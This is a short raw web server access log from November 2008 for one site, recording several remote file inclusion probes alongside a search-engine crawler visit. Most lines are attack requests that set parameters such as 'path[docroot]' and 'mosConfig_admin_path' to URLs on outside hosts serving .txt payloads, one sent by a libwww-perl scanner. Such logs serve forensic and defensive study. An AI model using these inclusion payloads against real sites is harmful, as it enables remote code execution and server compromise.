87.106.243.160 - - [04/Nov/2008:09:36:35 -0800] "GET /logs//?path%5Bdocroot%5D=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 200 72168 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:36:36 -0800] "GET /?path%5Bdocroot%5D=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 200 94835 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:36:54 -0800] "GET /logs/access_080430.log//?path%5Bdocroot%5D=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:09:37:10 -0800] "GET /bikes/dteel/2008_10_24/?M=A HTTP/1.0" 200 1680 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.174.68.56 - - [04/Nov/2008:09:37:41 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:38:58 -0800] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:38:59 -0800] "GET /logs//?path%5Bdocroot%5D=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 200 72168 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
